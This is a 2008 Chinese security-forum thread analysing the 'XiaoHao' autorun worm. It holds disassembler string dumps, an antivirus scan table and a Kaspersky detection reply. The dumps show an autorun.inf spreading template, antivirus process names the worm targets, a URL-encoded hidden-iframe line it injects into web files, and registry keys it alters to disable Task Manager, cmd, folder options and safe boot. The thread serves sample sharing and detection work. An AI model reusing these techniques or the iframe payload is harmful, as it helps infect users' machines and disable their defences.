挖掘最新“小浩”病毒

wusuobuzai

哈哈~!被微点拦截了...微点还是很强的.

ranguangning

地址            反汇编                                                   文本字串
00401F6E   MOV EAX,XiaoHao.00403BE3                  溉=@
00401FCD   MOV EAX,XiaoHao.00403C03                  给=@
00402083   PUSH XiaoHao.00401480                     [autorun]\n\n
00402094   PUSH XiaoHao.0040146C                     open=xiaohao.com\n\n
004020A1   PUSH XiaoHao.00401454                     shell\open=打开(&o)\n\n
004020AE   PUSH XiaoHao.00401430                     shell\open\command=xiaohao.com\n\n
004020BB   PUSH XiaoHao.00401418                     shell\open\default=1\n\n
004020C8   PUSH XiaoHao.004013F8                     shell\explore=资源管理器(&x)\n\n
004020D5   PUSH XiaoHao.004013D4                     shell\explore\command=xiaohao.com\n\n
004020E2   PUSH XiaoHao.004013B8                     shellexecute=xiaohao.com\n\n
004020EF   PUSH XiaoHao.00401394                     shell\auto\command=xiaohao.com\n\n
00402108   PUSH XiaoHao.00401388                     autorun.inf
00402121   PUSH XiaoHao.0040137C                     xiaohao.com
00402217   MOV EDI,XiaoHao.00401534                  %s
00402231   PUSH XiaoHao.00401524                     \exloroe.com
00402284   MOV EBX,XiaoHao.00401520                  \
004022AC   PUSH XiaoHao.0040151C                     *.*
004023FD   PUSH XiaoHao.00401518                     htm
0040240D   PUSH XiaoHao.00401510                     html
0040241D   PUSH XiaoHao.0040150C                     asp
0040242D   PUSH XiaoHao.00401504                     aspx
0040243D   PUSH XiaoHao.00401500                     php
0040244D   PUSH XiaoHao.004014FC                     jsp
00402482   PUSH XiaoHao.004014F4                     avp.exe
00402492   PUSH XiaoHao.004014E8                     kavscr.exe
004024A2   PUSH XiaoHao.004014E0                     rav.exe
004024B2   PUSH XiaoHao.004014D0                     navapw32.exe
004024C2   PUSH XiaoHao.004014C4                     iparmor.exe
004024D2   PUSH XiaoHao.004014BC                     kv*.exe
004024F4   PUSH XiaoHao.004014B0                     xiaohao.exe
00402518   PUSH XiaoHao.004014A4                     xiaohao.exe
00402544   PUSH XiaoHao.00401498                     xiaohao.exe
00402570   PUSH XiaoHao.0040148C                     config.exe
00402667   PUSH XiaoHao.00401540                     http://%77%77%77%2e%31%35%38%64%6d%2e%63%6e/%62%64%2e%68%74%6d
0040266C   PUSH XiaoHao.00401538                     open
0040270E   MOV EAX,XiaoHao.00403CD0                  葛>@
00402729   PUSH XiaoHao.00401580                     \n\n<iframe src=http://%77%77%77%2e%31%35%38%64%6d%2e%63%6e/%61%31%2e%68%74%6d width=0 height=0></iframe>
004027DA   PUSH XiaoHao.004015E8                     r+b
0040289E   PUSH XiaoHao.004015EC                     ygr
00402A56   MOV EAX,XiaoHao.00401D10                  p*@
00402A66   MOV DWORD PTR DS:[ESI],XiaoHao.00401D48   ^8@
00402AEC   PUSH XiaoHao.00401534                     %s
00402B38   PUSH XiaoHao.00401628                     \\
00402C04   PUSH XiaoHao.00401604                     exefile\shell\open\command
00402C1B   PUSH XiaoHao.00401538                     open
00402C45   MOV EDI,XiaoHao.004015F8                   "%1" %*
00402C8C   PUSH XiaoHao.00401604                     exefile\shell\open\command
00402C9C   PUSH XiaoHao.004015F0                     hack
00402D23   MOV EAX,XiaoHao.00403D68                  葛?@
00402EE0   PUSH XiaoHao.00401534                     %s
00402EF1   PUSH XiaoHao.00401524                     \exloroe.com
00402F17   MOV EDI,XiaoHao.004016C8                  c:\documents and settings\all users\「开始」菜单\程序\启动
00402F43   MOV EDI,XiaoHao.004016BC                  \word.com
00402FC5   MOV EDI,XiaoHao.00401688                  software\microsoft\windows\currentversion\run
00403011   PUSH XiaoHao.00401680                     exloroe
00403028   PUSH XiaoHao.00401644                     software\policies\microsoft\internet explorer\restrictions
00403052   PUSH XiaoHao.00401630                     nobrowseroptions
00403105   PUSH XiaoHao.0040162C                     a:\
0040317D   PUSH XiaoHao.0040162C                     a:\
0040320B   MOV ESI,XiaoHao.00401714                  software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall
00403241   PUSH XiaoHao.00401704                     checkedvalue
0040326B   PUSH XiaoHao.004017C4                     software\microsoft\windows\currentversion\policies\system
0040327F   PUSH XiaoHao.00401778                     software\microsoft\windows\currentversion\policies\system\disabletaskmgr
00403295   PUSH XiaoHao.00401768                     disabletaskmgr
004032CD   PUSH XiaoHao.004017C4                     software\microsoft\windows\currentversion\policies\system
004032E7   PUSH XiaoHao.00401800                     disableregistrytools
0040330C   MOV ESI,XiaoHao.004018D8                  radio
00403333   PUSH XiaoHao.0040189C                     software\microsoft\windows\currentversion\explorer\advanced
00403353   PUSH XiaoHao.0040188C                     showsuperhidden
0040336C   PUSH XiaoHao.0040183C                     software\microsoft\windows\currentversion\explorer\advanced\folder\superhidden
00403391   PUSH XiaoHao.00401834                     type
0040339B   PUSH XiaoHao.00401818                     regfile\shell\open\command
004033C5   PUSH XiaoHao.00401944                     software\microsoft\windows\current version\policies\explorer\nofolderoptions
004033DF   PUSH XiaoHao.00401934                     nofolderoptions
004033F6   PUSH XiaoHao.004018E0                     software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall
004034BF   PUSH XiaoHao.00401B8C                     software\policies\microsoft\windows\system
004034DB   PUSH XiaoHao.00401B80                     disablecmd
00403502   PUSH XiaoHao.00401B34                     software\microsoft\windows\currentversion\policies\explorer\nocommon groups
00403518   PUSH XiaoHao.00401B24                     nocommon groups
0040352B   PUSH XiaoHao.00401B0C                     control panel\desktop
0040356D   PUSH XiaoHao.00401AFC                     autoendtasks
00403587   PUSH XiaoHao.00401AA0                     system\currentcontrolset\control\safeboot\network\{4d36e967-e325-11ce-bfc1-08002be10318}
0040358F   PUSH XiaoHao.00401A48                     system\controlset001\control\safeboot\network\{4d36e967-e325-11ce-bfc1-08002be10318}
00403597   PUSH XiaoHao.004019EC                     system\currentcontrolset\control\safeboot\minimal\{4d36e967-e325-11ce-bfc1-08002be10318}
0040359F   PUSH XiaoHao.00401994                     system\controlset001\control\safeboot\minimal\{4d36e967-e325-11ce-bfc1-08002be10318}
004039BD   PUSH EBP                                  (初始 cpu 选择)

yunying

貌似加壳了

ranguangning

地址            反汇编                                                   文本字串
00402083   PUSH XiaoHao.00401480                     [autorun]\n\nconfig.exe
00402094   PUSH XiaoHao.0040146C                     open=xiaohao.com\n\n
004020A1   PUSH XiaoHao.00401454                     shell\open=打开(&o)\n\n
004020AE   PUSH XiaoHao.00401430                     shell\open\command=xiaohao.com\n\n
004020BB   PUSH XiaoHao.00401418                     shell\open\default=1\n\n
004020C8   PUSH XiaoHao.004013F8                     shell\explore=资源管理器(&x)\n\n
004020D5   PUSH XiaoHao.004013D4                     shell\explore\command=xiaohao.com\n\nshell\explore=资源管理器(&x)\n\n
004020E2   PUSH XiaoHao.004013B8                     shellexecute=xiaohao.com\n\n
004020EF   PUSH XiaoHao.00401394                     shell\auto\command=xiaohao.com\n\n
00402108   PUSH XiaoHao.00401388                     autorun.infshell\auto\command=xiaohao.com\n\n
00402121   PUSH XiaoHao.0040137C                     xiaohao.comautorun.infshell\auto\command=xiaohao.com\n\n
00402217   MOV EDI,XiaoHao.00401534                  %s
00402231   PUSH XiaoHao.00401524                     \exloroe.com
00402284   MOV EBX,XiaoHao.00401520                  \
004022AC   PUSH XiaoHao.0040151C                     *.*\
004023FD   PUSH XiaoHao.00401518                     htm*.*\
0040240D   PUSH XiaoHao.00401510                     html
0040241D   PUSH XiaoHao.0040150C                     asphtml
0040242D   PUSH XiaoHao.00401504                     aspx
0040243D   PUSH XiaoHao.00401500                     phpaspx
0040244D   PUSH XiaoHao.004014FC                     jspphpaspx
00402482   PUSH XiaoHao.004014F4                     avp.exejspphpaspx
00402492   PUSH XiaoHao.004014E8                     kavscr.exe
004024A2   PUSH XiaoHao.004014E0                     rav.exekavscr.exe
004024B2   PUSH XiaoHao.004014D0                     navapw32.exe
004024C2   PUSH XiaoHao.004014C4                     iparmor.exenavapw32.exe
004024D2   PUSH XiaoHao.004014BC                     kv*.exeiparmor.exenavapw32.exe
004024F4   PUSH XiaoHao.004014B0                     xiaohao.exekv*.exeiparmor.exenavapw32.exe
00402518   PUSH XiaoHao.004014A4                     xiaohao.exexiaohao.exekv*.exeiparmor.exenavapw32.exe
00402544   PUSH XiaoHao.00401498                     xiaohao.exexiaohao.exexiaohao.exekv*.exeiparmor.exenavapw32.exe
00402570   PUSH XiaoHao.0040148C                     config.exe
00402667   PUSH XiaoHao.00401540                     http://%77%77%77%2e%31%35%38%64%6d%2e%63%6e/%62%64%2e%68%74%6d
0040266C   PUSH XiaoHao.00401538                     open
00402729   PUSH XiaoHao.00401580                     \n\n<iframe src=http://%77%77%77%2e%31%35%38%64%6d%2e%63%6e/%61%31%2e%68%74%6d width=0 height=0></iframe>r+bygrhack
004027DA   PUSH XiaoHao.004015E8                     r+bygrhack
0040289E   PUSH XiaoHao.004015EC                     ygrhack
00402AEC   PUSH XiaoHao.00401534                     %s
00402B38   PUSH XiaoHao.00401628                     \\
00402C04   PUSH XiaoHao.00401604                     exefile\shell\open\command
00402C1B   PUSH XiaoHao.00401538                     open
00402C45   MOV EDI,XiaoHao.004015F8                   "%1" %*
00402C8C   PUSH XiaoHao.00401604                     exefile\shell\open\command
00402C9C   PUSH XiaoHao.004015F0                     hack
00402EE0   PUSH XiaoHao.00401534                     %s
00402EF1   PUSH XiaoHao.00401524                     \exloroe.com
00402F43   MOV EDI,XiaoHao.004016BC                  \word.com
00402FC5   MOV EDI,XiaoHao.00401688                  software\microsoft\windows\currentversion\run
00403011   PUSH XiaoHao.00401680                     exloroesoftware\microsoft\windows\currentversion\run
00403028   PUSH XiaoHao.00401644                     software\policies\microsoft\internet explorer\restrictions
00403052   PUSH XiaoHao.00401630                     nobrowseroptions
00403105   PUSH XiaoHao.0040162C                     a:\nobrowseroptions
0040317D   PUSH XiaoHao.0040162C                     a:\nobrowseroptions
0040320B   MOV ESI,XiaoHao.00401714                  software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall
00403241   PUSH XiaoHao.00401704                     checkedvalue
0040326B   PUSH XiaoHao.004017C4                     software\microsoft\windows\currentversion\policies\system
0040327F   PUSH XiaoHao.00401778                     software\microsoft\windows\currentversion\policies\system\disabletaskmgr
00403295   PUSH XiaoHao.00401768                     disabletaskmgr
004032CD   PUSH XiaoHao.004017C4                     software\microsoft\windows\currentversion\policies\system
004032E7   PUSH XiaoHao.00401800                     disableregistrytools
0040330C   MOV ESI,XiaoHao.004018D8                  radio
00403333   PUSH XiaoHao.0040189C                     software\microsoft\windows\currentversion\explorer\advancedradio
00403353   PUSH XiaoHao.0040188C                     showsuperhiddensoftware\microsoft\windows\currentversion\explorer\advancedradio
0040336C   PUSH XiaoHao.0040183C                     software\microsoft\windows\currentversion\explorer\advanced\folder\superhidden
00403391   PUSH XiaoHao.00401834                     type
0040339B   PUSH XiaoHao.00401818                     regfile\shell\open\command
004033C5   PUSH XiaoHao.00401944                     software\microsoft\windows\current version\policies\explorer\nofolderoptions
004033DF   PUSH XiaoHao.00401934                     nofolderoptionssoftware\microsoft\windows\current version\policies\explorer\nofolderoptions
004033F6   PUSH XiaoHao.004018E0                     software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall
004034BF   PUSH XiaoHao.00401B8C                     software\policies\microsoft\windows\system
004034DB   PUSH XiaoHao.00401B80                     disablecmd
00403502   PUSH XiaoHao.00401B34                     software\microsoft\windows\currentversion\policies\explorer\nocommon groupsdisablecmd
00403518   PUSH XiaoHao.00401B24                     nocommon groupssoftware\microsoft\windows\currentversion\policies\explorer\nocommon groupsdisablecmd
0040352B   PUSH XiaoHao.00401B0C                     control panel\desktop
0040356D   PUSH XiaoHao.00401AFC                     autoendtasks
00403587   PUSH XiaoHao.00401AA0                     system\currentcontrolset\control\safeboot\network\{4d36e967-e325-11ce-bfc1-08002be10318}
0040358F   PUSH XiaoHao.00401A48                     system\controlset001\control\safeboot\network\{4d36e967-e325-11ce-bfc1-08002be10318}
00403597   PUSH XiaoHao.004019EC                     system\currentcontrolset\control\safeboot\minimal\{4d36e967-e325-11ce-bfc1-08002be10318}
0040359F   PUSH XiaoHao.00401994                     system\controlset001\control\safeboot\minimal\{4d36e967-e325-11ce-bfc1-08002be10318}
004039BD   PUSH EBP                                  (初始 cpu 选择)

[ 本帖最后由 ranguangning 于 2008-4-26 17:38 编辑 ]

tracydk

AhnLab-V3	2008.4.25.2	2008.04.25	-
AntiVir	7.8.0.10	2008.04.25	-
Authentium	4.93.8	2008.04.26	-
Avast	4.8.1169.0	2008.04.25	-
AVG	7.5.0.516	2008.04.25	-
BitDefender	7.2	2008.04.26	-
CAT-QuickHeal	9.50	2008.04.26	(Suspicious) - DNAScan
ClamAV	0.92.1	2008.04.26	-
DrWeb	4.44.0.09170	2008.04.26	-
eSafe	7.0.15.0	2008.04.21	-
eTrust-Vet	31.3.5736	2008.04.26	-
Ewido	4.0	2008.04.25	-
F-Prot	4.4.2.54	2008.04.25	-
F-Secure	6.70.13260.0	2008.04.26	-
FileAdvisor	1	2008.04.26	-
Fortinet	3.14.0.0	2008.04.26	-
Ikarus	T3.1.1.26	2008.04.26	-
Kaspersky	7.0.0.125	2008.04.26	-
McAfee	5282	2008.04.25	-
Microsoft	1.3408	2008.04.22	-
NOD32v2	3056	2008.04.26	-
Norman	5.80.02	2008.04.25	-
Panda	9.0.0.4	2008.04.26	Suspicious file
Prevx1	V2	2008.04.26	Generic.Malware
Rising	20.41.50.00	2008.04.26	-
Sophos	4.28.0	2008.04.26	-
Sunbelt	3.0.1056.0	2008.04.17	-
Symantec	10	2008.04.26	-
TheHacker	6.2.92.293	2008.04.26	-
VBA32	3.12.6.5	2008.04.26	-
VirusBuster	4.3.26:9	2008.04.25	-
Webwasher-Gateway	6.6.2	2008.04.26	-

wangjay1980

gHello,

XiaoHao.exe_ - Worm.Win32.AutoRun.dnb

New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Vyacheslav Zakorzhevsky
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.



> Attachment: XiaoHao.zip[:1:]

allinwonderi

ArcaVir miss

fhmarch666

小浩的图标... ...

zwl2828

原帖由 fhmarch666 于 2008-4-26 20:56 发表
小浩的图标... ...

小耗

PC0amera

强悍的卡巴主防...